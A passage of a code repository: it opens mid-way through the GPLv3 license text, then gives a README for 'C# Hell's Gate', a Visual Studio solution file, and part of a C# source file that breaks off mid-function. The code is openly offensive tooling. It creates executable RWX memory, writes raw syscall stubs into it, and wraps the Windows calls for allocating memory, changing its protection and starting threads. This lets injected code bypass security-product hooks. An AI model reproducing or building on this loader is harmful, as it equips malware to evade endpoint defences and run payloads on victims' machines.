||||
users, your or third parties' legal rights to forbid circumvention of
|
||||
technological measures.
|
||||
|
||||
4. Conveying Verbatim Copies.
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you
|
||||
receive it, in any medium, provided that you conspicuously and
|
||||
appropriately publish on each copy an appropriate copyright notice;
|
||||
keep intact all notices stating that this License and any
|
||||
non-permissive terms added in accord with section 7 apply to the code;
|
||||
keep intact all notices of the absence of any warranty; and give all
|
||||
recipients a copy of this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey,
|
||||
and you may offer support or warranty protection for a fee.
|
||||
|
||||
5. Conveying Modified Source Versions.
|
||||
|
||||
You may convey a work based on the Program, or the modifications to
|
||||
produce it from the Program, in the form of source code under the
|
||||
terms of section 4, provided that you also meet all of these conditions:
|
||||
|
||||
a) The work must carry prominent notices stating that you modified
|
||||
it, and giving a relevant date.
|
||||
|
||||
b) The work must carry prominent notices stating that it is
|
||||
released under this License and any conditions added under section
|
||||
7. This requirement modifies the requirement in section 4 to
|
||||
"keep intact all notices".
|
||||
|
||||
c) You must license the entire work, as a whole, under this
|
||||
License to anyone who comes into possession of a copy. This
|
||||
License will therefore apply, along with any applicable section 7
|
||||
additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no
|
||||
permission to license the work in any other way, but it does not
|
||||
invalidate such permission if you have separately received it.
|
||||
|
||||
d) If the work has interactive user interfaces, each must display
|
||||
Appropriate Legal Notices; however, if the Program has interactive
|
||||
interfaces that do not display Appropriate Legal Notices, your
|
||||
work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent
|
||||
works, which are not by their nature extensions of the covered work,
|
||||
and which are not combined with it such as to form a larger program,
|
||||
in or on a volume of a storage or distribution medium, is called an
|
||||
"aggregate" if the compilation and its resulting copyright are not
|
||||
used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work
|
||||
in an aggregate does not cause this License to apply to the other
|
||||
parts of the aggregate.
|
||||
|
||||
6. Conveying Non-Source Forms.
|
||||
|
||||
You may convey a covered work in object code form under the terms
|
||||
of sections 4 and 5, provided that you also convey the
|
||||
machine-readable Corresponding Source under the terms of this License,
|
||||
in one of these ways:
|
||||
|
||||
a) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by the
|
||||
Corresponding Source fixed on a durable physical medium
|
||||
customarily used for software interchange.
|
||||
|
||||
b) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by a
|
||||
written offer, valid for at least three years and valid for as
|
||||
long as you offer spare parts or customer support for that product
|
||||
model, to give anyone who possesses the object code either (1) a
|
||||
copy of the Corresponding Source for all the software in the
|
||||
product that is covered by this License, on a durable physical
|
||||
medium customarily used for software interchange, for a price no
|
||||
more than your reasonable cost of physically performing this
|
||||
conveying of source, or (2) access to copy the
|
||||
Corresponding Source from a network server at no charge.
|
||||
|
||||
c) Convey individual copies of the object code with a copy of the
|
||||
written offer to provide the Corresponding Source. This
|
||||
alternative is allowed only occasionally and noncommercially, and
|
||||
only if you received the object code with such an offer, in accord
|
||||
with subsection 6b.
|
||||
|
||||
d) Convey the object code by offering access from a designated
|
||||
place (gratis or for a charge), and offer equivalent access to the
|
||||
Corresponding Source in the same way through the same place at no
|
||||
further charge. You need not require recipients to copy the
|
||||
Corresponding Source along with the object code. If the place to
|
||||
copy the object code is a network server, the Corresponding Source
|
||||
may be on a different server (operated by you or a third party)
|
||||
that supports equivalent copying facilities, provided you maintain
|
||||
clear directions next to the object code saying where to find the
|
||||
Corresponding Source. Regardless of what server hosts the
|
||||
Corresponding Source, you remain obligated to ensure that it is
|
||||
available for as long as needed to satisfy these requirements.
|
||||
|
||||
e) Convey the object code using peer-to-peer transmission, provided
|
||||
you inform other peers where the object code and Corresponding
|
||||
Source of the work are being offered to the general public at no
|
||||
charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded
|
||||
from the Corresponding Source as a System Library, need not be
|
||||
included in conveying the object code work.
|
||||
|
||||
A "User Product" is either (1) a "consumer product", which means any
|
||||
tangible personal property which is normally used for personal, family,
|
||||
or household purposes, or (2) anything designed or sold for incorporation
|
||||
into a dwelling. In determining whether a product is a consumer product,
|
||||
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||
product received by a particular user, "normally used" refers to a
|
||||
typical or common use of that class of product, regardless of the status
|
||||
of the particular user or of the way in which the particular user
|
||||
actually uses, or expects or is expected to use, the product. A product
|
||||
is a consumer product regardless of whether the product has substantial
|
||||
commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
"Installation Information" for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install
|
||||
and execute modified versions of a covered work in that User Product from
|
||||
a modified version of its Corresponding Source. The information must
|
||||
suffice to ensure that the continued functioning of the modified object
|
||||
code is in no case prevented or interfered with solely because
|
||||
modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or
|
||||
specifically for use in, a User Product, and the conveying occurs as
|
||||
part of a transaction in which the right of possession and use of the
|
||||
User Product is transferred to the recipient in perpetuity or for a
|
||||
fixed term (regardless of how the transaction is characterized), the
|
||||
Corresponding Source conveyed under this section must be accompanied
|
||||
by the Installation Information. But this requirement does not apply
|
||||
if neither you nor any third party retains the ability to install
|
||||
modified object code on the User Product (for example, the work has
|
||||
been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a
|
||||
requirement to continue to provide support service, warranty, or updates
|
||||
for a work that has been modified or installed by the recipient, or for
|
||||
the User Product in which it has been modified or installed. Access to a
|
||||
network may be denied when the modification itself materially and
|
||||
adversely affects the operation of the network or violates the rules and
|
||||
protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided,
|
||||
in accord with this section must be in a format that is publicly
|
||||
documented (and with an implementation available to the public in
|
||||
source code form), and must require no special password or key for
|
||||
unpacking, reading or copying.
|
||||
|
||||
7. Additional Terms.
|
||||
|
||||
"Additional permissions" are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions.
|
||||
Additional permissions that are applicable to the entire Program shall
|
||||
be treated as though they were included in this License, to the extent
|
||||
that they are valid under applicable law. If additional permissions
|
||||
apply only to part of the Program, that part may be used separately
|
||||
under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option
|
||||
remove any additional permissions from that copy, or from any part of
|
||||
it. (Additional permissions may be written to require their own
|
||||
removal in certain cases when you modify the work.) You may place
|
||||
additional permissions on material, added by you to a covered work,
|
||||
for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you
|
||||
add to a covered work, you may (if authorized by the copyright holders of
|
||||
that material) supplement the terms of this License with terms:
|
||||
|
||||
a) Disclaiming warranty or limiting liability differently from the
|
||||
terms of sections 15 and 16 of this License; or
|
||||
|
||||
b) Requiring preservation of specified reasonable legal notices or
|
||||
author attributions in that material or in the Appropriate Legal
|
||||
Notices displayed by works containing it; or
|
||||
|
||||
c) Prohibiting misrepresentation of the origin of that material, or
|
||||
requiring that modified versions of such material be marked in
|
||||
reasonable ways as different from the original version; or
|
||||
|
||||
d) Limiting the use for publicity purposes of names of licensors or
|
||||
authors of the material; or
|
||||
|
||||
e) Declining to grant rights under trademark law for use of some
|
||||
trade names, trademarks, or service marks; or
|
||||
|
||||
f) Requiring indemnification of licensors and authors of that
|
||||
material by anyone who conveys the material (or modified versions of
|
||||
it) with contractual assumptions of liability to the recipient, for
|
||||
any liability that these contractual assumptions directly impose on
|
||||
those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered "further
|
||||
restrictions" within the meaning of section 10. If the Program as you
|
||||
received it, or any part of it, contains a notice stating that it is
|
||||
governed by this License along with a term that is a further
|
||||
restriction, you may remove that term. If a license document contains
|
||||
a further restriction but permits relicensing or conveying under this
|
||||
License, you may add to a covered work material governed by the terms
|
||||
of that license document, provided that the further restriction does
|
||||
not survive such relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you
|
||||
must place, in the relevant source files, a statement of the
|
||||
additional terms that apply to those files, or a notice indicating
|
||||
where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the
|
||||
form of a separately written license, or stated as exceptions;
|
||||
the above requirements apply either way.
|
||||
|
||||
8. Termination.
|
||||
|
||||
You may not propagate or modify a covered work except as expressly
|
||||
provided under this License. Any attempt otherwise to propagate or
|
||||
modify it is void, and will automatically terminate your rights under
|
||||
this License (including any patent licenses granted under the third
|
||||
paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your
|
||||
license from a particular copyright holder is reinstated (a)
|
||||
provisionally, unless and until the copyright holder explicitly and
|
||||
finally terminates your license, and (b) permanently, if the copyright
|
||||
holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is
|
||||
reinstated permanently if the copyright holder notifies you of the
|
||||
violation by some reasonable means, this is the first time you have
|
||||
received notice of violation of this License (for any work) from that
|
||||
copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the
|
||||
licenses of parties who have received copies or rights from you under
|
||||
this License. If your rights have been terminated and not permanently
|
||||
reinstated, you do not qualify to receive new licenses for the same
|
||||
material under section 10.
|
||||
|
||||
9. Acceptance Not Required for Having Copies.
|
||||
|
||||
You are not required to accept this License in order to receive or
|
||||
run a copy of the Program. Ancillary propagation of a covered work
|
||||
occurring solely as a consequence of using peer-to-peer transmission
|
||||
to receive a copy likewise does not require acceptance. However,
|
||||
nothing other than this License grants you permission to propagate or
|
||||
modify any covered work. These actions infringe copyright if you do
|
||||
not accept this License. Therefore, by modifying or propagating a
|
||||
covered work, you indicate your acceptance of this License to do so.
|
||||
|
||||
10. Automatic Licensing of Downstream Recipients.
|
||||
|
||||
Each time you convey a covered work, the recipient automatically
|
||||
receives a license from the original licensors, to run, modify and
|
||||
propagate that work, subject to this License. You are not responsible
|
||||
for enforcing compliance by third parties with this License.
|
||||
|
||||
An "entity transaction" is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an
|
||||
organization, or merging organizations. If propagation of a covered
|
||||
work results from an entity transaction, each party to that
|
||||
transaction who receives a copy of the work also receives whatever
|
||||
licenses to the work the party's predecessor in interest had or could
|
||||
give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if
|
||||
the predecessor has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the
|
||||
rights granted or affirmed under this License. For example, you may
|
||||
not impose a license fee, royalty, or other charge for exercise of
|
||||
rights granted under this License, and you may not initiate litigation
|
||||
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||
any patent claim is infringed by making, using, selling, offering for
|
||||
sale, or importing the Program or any portion of it.
|
||||
|
||||
11. Patents.
|
||||
|
||||
A "contributor" is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The
|
||||
work thus licensed is called the contributor's "contributor version".
|
||||
|
||||
A contributor's "essential patent claims" are all patent claims
|
||||
owned or controlled by the contributor, whether already acquired or
|
||||
hereafter acquired, that would be infringed by some manner, permitted
|
||||
by this License, of making, using, or selling its contributor version,
|
||||
but do not include claims that would be infringed only as a
|
||||
consequence of further modification of the contributor version. For
|
||||
purposes of this definition, "control" includes the right to grant
|
||||
patent sublicenses in a manner consistent with the requirements of
|
||||
this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||
patent license under the contributor's essential patent claims, to
|
||||
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||
propagate the contents of its contributor version.
|
||||
|
||||
In the following three paragraphs, a "patent license" is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent
|
||||
(such as an express permission to practice a patent or covenant not to
|
||||
sue for patent infringement). To "grant" such a patent license to a
|
||||
party means to make such an agreement or commitment not to enforce a
|
||||
patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license,
|
||||
and the Corresponding Source of the work is not available for anyone
|
||||
to copy, free of charge and under the terms of this License, through a
|
||||
publicly available network server or other readily accessible means,
|
||||
then you must either (1) cause the Corresponding Source to be so
|
||||
available, or (2) arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or (3) arrange, in a manner
|
||||
consistent with the requirements of this License, to extend the patent
|
||||
license to downstream recipients. "Knowingly relying" means you have
|
||||
actual knowledge that, but for the patent license, your conveying the
|
||||
covered work in a country, or your recipient's use of the covered work
|
||||
in a country, would infringe one or more identifiable patents in that
|
||||
country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or
|
||||
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||
covered work, and grant a patent license to some of the parties
|
||||
receiving the covered work authorizing them to use, propagate, modify
|
||||
or convey a specific copy of the covered work, then the patent license
|
||||
you grant is automatically extended to all recipients of the covered
|
||||
work and works based on it.
|
||||
|
||||
A patent license is "discriminatory" if it does not include within
|
||||
the scope of its coverage, prohibits the exercise of, or is
|
||||
conditioned on the non-exercise of one or more of the rights that are
|
||||
specifically granted under this License. You may not convey a covered
|
||||
work if you are a party to an arrangement with a third party that is
|
||||
in the business of distributing software, under which you make payment
|
||||
to the third party based on the extent of your activity of conveying
|
||||
the work, and under which the third party grants, to any of the
|
||||
parties who would receive the covered work from you, a discriminatory
|
||||
patent license (a) in connection with copies of the covered work
|
||||
conveyed by you (or copies made from those copies), or (b) primarily
|
||||
for and in connection with specific products or compilations that
|
||||
contain the covered work, unless you entered into that arrangement,
|
||||
or that patent license was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting
|
||||
any implied license or other defenses to infringement that may
|
||||
otherwise be available to you under applicable patent law.
|
||||
|
||||
12. No Surrender of Others' Freedom.
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot convey a
|
||||
covered work so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you may
|
||||
not convey it at all. For example, if you agree to terms that obligate you
|
||||
to collect a royalty for further conveying from those to whom you convey
|
||||
the Program, the only way you could satisfy both those terms and this
|
||||
License would be to refrain entirely from conveying the Program.
|
||||
|
||||
13. Use with the GNU Affero General Public License.
|
||||
|
||||
Notwithstanding any other provision of this License, you have
|
||||
permission to link or combine any covered work with a work licensed
|
||||
under version 3 of the GNU Affero General Public License into a single
|
||||
combined work, and to convey the resulting work. The terms of this
|
||||
License will continue to apply to the part which is the covered work,
|
||||
but the special requirements of the GNU Affero General Public License,
|
||||
section 13, concerning interaction through a network will apply to the
|
||||
combination as such.
|
||||
|
||||
14. Revised Versions of this License.
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of
|
||||
the GNU General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the
|
||||
Program specifies that a certain numbered version of the GNU General
|
||||
Public License "or any later version" applies to it, you have the
|
||||
option of following the terms and conditions either of that numbered
|
||||
version or of any later version published by the Free Software
|
||||
Foundation. If the Program does not specify a version number of the
|
||||
GNU General Public License, you may choose any version ever published
|
||||
by the Free Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future
|
||||
versions of the GNU General Public License can be used, that proxy's
|
||||
public statement of acceptance of a version permanently authorizes you
|
||||
to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different
|
||||
permissions. However, no additional obligations are imposed on any
|
||||
author or copyright holder as a result of your choosing to follow a
|
||||
later version.
|
||||
|
||||
15. Disclaimer of Warranty.
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
16. Limitation of Liability.
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGES.
|
||||
|
||||
17. Interpretation of Sections 15 and 16.
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided
|
||||
above cannot be given local legal effect according to their terms,
|
||||
reviewing courts shall apply local law that most closely approximates
|
||||
an absolute waiver of all civil liability in connection with the
|
||||
Program, unless a warranty or assumption of liability accompanies a
|
||||
copy of the Program in return for a fee.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
state the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short
|
||||
notice like this when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, your program's commands
|
||||
might be different; for a GUI interface, you would use an "about box".
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school,
|
||||
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||
For more information on this, and how to apply and follow the GNU GPL, see
|
||||
<https://www.gnu.org/licenses/>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program
|
||||
into proprietary programs. If your program is a subroutine library, you
|
||||
may consider it more useful to permit linking proprietary applications with
|
||||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
|
@ -0,0 +1,11 @@
|
|||
## C# Hell's Gate ##
|
||||
C# Implementation of the Hell's Gate VX Technique
|
||||
<br />
|
||||
<br />
|
||||
Link to the paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
|
||||
<br /> PDF also included in this repository.
|
||||
<br />
|
||||
<br />
|
||||
Link to the original C implementation: https://github.com/am0nsec/HellsGate
|
||||
<br />
|
||||
<br />
|
|
@ -0,0 +1,25 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.30114.105
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHellsGate", "SharpHellsGate\SharpHellsGate.csproj", "{F6A46854-FDC2-4F27-9051-5C7BE8E68733}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {CA2A2F5F-A135-4771-A014-A6F2C0D24538}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,278 @@
|
|||
using System;
|
||||
using SharpHellsGate.Win32;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Collections.Generic;
|
||||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Main implementation of the Hell's Gate technique.
|
||||
/// Responsible for generating a RWX memory region, inject and execute system call stubs.
|
||||
/// </summary>
|
||||
public class HellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Used to check if the RWX memory region was generated.
|
||||
/// </summary>
|
||||
private bool IsGateReady { get; set; } = false;
|
||||
|
||||
/// <summary>
|
||||
/// Used as for mutual exclusion while injecting and execution of the system call stub in memory.
|
||||
/// </summary>
|
||||
private object Mutant { get; set; } = new object();
|
||||
|
||||
/// <summary>
|
||||
///
|
||||
/// </summary>
|
||||
private Dictionary<UInt64, Util.APITableEntry> APITable { get; set; } = new Dictionary<ulong, Util.APITableEntry>() { };
|
||||
|
||||
/// <summary>
|
||||
/// Address of the managed method that was JIT'ed.
|
||||
/// </summary>
|
||||
private IntPtr MangedMethodAddress { get; set; } = IntPtr.Zero;
|
||||
|
||||
/// <summary>
|
||||
/// Address of the RWX memory region after JIT compiling the managed method.
|
||||
/// </summary>
|
||||
private IntPtr UnmanagedMethodAddress { get; set; } = IntPtr.Zero;
|
||||
|
||||
/// <summary>
|
||||
/// This function will be JIT at runtime to create RWX memory region.
|
||||
/// </summary>
|
||||
//// <returns>Gate returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
||||
private static UInt32 Gate() {
|
||||
return new UInt32();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Inject in memory a basic system call stub and return a delegate for execution via un-managed code.
|
||||
/// </summary>
|
||||
/// <typeparam name="T">The desired delegate Type.</typeparam>
|
||||
/// <param name="syscall">The system call to execute.</param>
|
||||
/// <returns>A delegate of to execute the system call.</returns>
|
||||
private T NtInvocation<T>(Int16 syscall) where T: Delegate {
|
||||
if (!this.IsGateReady || this.UnmanagedMethodAddress == IntPtr.Zero) {
|
||||
Util.LogError("Unable to inject system call stub");
|
||||
return default;
|
||||
}
|
||||
|
||||
Span<byte> stub = stackalloc byte[24] {
|
||||
0x4c, 0x8b, 0xd1, // mov r10, rcx
|
||||
0xb8, (byte)syscall, (byte)(syscall >> 8), 0x00, 0x00, // mov eax, <syscall
|
||||
0xf6, 0x04, 0x25, 0x08, 0x03, 0xfe, 0x7f, 0x01, // test byte ptr [SharedUserData+0x308],1
|
||||
0x75, 0x03, // jne ntdll!<function>+0x15
|
||||
0x0f, 0x05, // syscall
|
||||
0xc3, // ret
|
||||
0xcd, 0x2e, // int 2Eh
|
||||
0xc3 // ret
|
||||
};
|
||||
|
||||
Marshal.Copy(stub.ToArray(), 0, this.UnmanagedMethodAddress, stub.Length);
|
||||
return Marshal.GetDelegateForFunctionPointer<T>(this.UnmanagedMethodAddress);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtAllocateVirtualMemoryHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtAllocateVirtualMemory Func = NtInvocation<DFunctions.NtAllocateVirtualMemory>(syscall);
|
||||
return Func(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 OldAccessProtection) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtProtectVirtualMemoryHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtProtectVirtualMemory Func = NtInvocation<DFunctions.NtProtectVirtualMemory>(syscall);
|
||||
return Func(ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, out OldAccessProtection);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||
/// <param name="StackZeroBits"></param>
|
||||
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||
/// <param name="lpBytesBuffer"></param>
|
||||
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtCreateThreadEx(ref IntPtr hThread, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtCreateThreadExHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtCreateThreadEx Func = NtInvocation<DFunctions.NtCreateThreadEx>(syscall);
|
||||
